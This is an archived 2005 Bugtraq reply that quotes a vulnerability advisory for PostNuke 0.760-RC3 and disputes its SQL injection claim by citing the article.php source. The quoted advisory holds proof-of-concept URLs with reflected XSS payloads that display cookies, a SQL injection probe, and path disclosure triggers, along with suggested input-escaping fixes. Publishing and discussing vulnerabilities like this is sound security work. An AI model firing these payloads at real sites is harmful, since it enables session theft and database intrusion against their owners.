Re: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3

From: Maksymilian Arciemowicz (max_at_jestsuper.pl)
Date: 04/08/05

  • Next message: kreon: "DoKuWiki file-upload vulnerabilities"
    Date: 8 Apr 2005 21:29:59 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <20050408023602.4627.qmail@www.securityfocus.com>

    >-----BEGIN PGP SIGNED MESSAGE-----
    >Hash: SHA1
    >
    >Dcrab 's Security Advisory
    >[Hsc Security Group] http://www.hackerscenter.com/
    >[dP Security] http://digitalparadox.org/
    >
    >Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
    >
    >GET INFORMED FIRST ABOUT MY ADVISORIES http://www.digitalparadox.org
    >
    >Severity: Medium
    >Title: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3
    >Date: 08/04/2005
    >
    >Vendor: PostNuke
    >Vendor Website: http://www.postnuke.com
    >Summary: There are, sql injection, xss and path disclosure vulnerabilities in postnuke 0.760-rc3.
    >
    >
    >Proof of Concept Exploits:
    >
    >http://localhost/admin.php?module=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480
    >Pops cookie
    >
    >
    >http://localhost/modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480
    >SQL INJECTION (look wayyy on the bottom of the page)
    >
    >DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for
    >the right syntax to use near '\'SQL_INJECTION' at line 23

    Are you sure, is that sql injection in 0.760=RC3?

    Code "article.php":
    if ((empty($sid) && empty($tid)) ||
        (!is_numeric($sid) && !is_numeric($tid))) {
            include 'header.php';
            echo _MODARGSERROR;
            include 'footer.php';
            exit;
    }

    So exit; ;] Bug don't work in 0.760-RC3. And in 0.750 exist path d.

    ---
    Fatal error: Cannot redeclare head() (previously declared in /www/PostNuke-0.750/html/header.php:44) in /www/PostNuke-0.750/html/header.php on line 142
    ---
    >
    >
    >http://localhost/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id='&POSTNUKESID=355776cfb622466924a7096d4471a480
    >Server Path disclosure
    >
    >Fatal error: Call to a member function on a non-object in /home/httpd/vhosts/localhost/httpdocs/modules/Reviews/index.php on line 976
    >
    >
    >http://localhost/user.php?op=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
    >Pops cookie
    >
    >
    >Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input 
    >validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
    >
    >Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
    >
    >Author: 
    >These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel 
    >free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. 
    >Lookout or my soon to come out book on Secure coding with php.
    >
    >-----BEGIN PGP SIGNATURE-----
    >Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
    >
    >iQA/AwUBQlXvwyZV5e8av/DUEQKa2QCgiDjVDkjyVdrXhbww/3zI8ksr8/EAnikN
    >BDxd/CIvzHYmLQAyb5suDR8K
    >=7MBl
    >-----END PGP SIGNATURE-----
    >
    >
    Frist check CVS. And if you public adv, frist check security contact. You bug:
    http://cvs.postnuke.com/viewcvs.cgi/Historic_PostNuke_Library/postnuke-devel/html/user.php.diff?r1=1.18&r2=1.19
    only xss.
    

  • Next message: kreon: "DoKuWiki file-upload vulnerabilities"

    Relevant Pages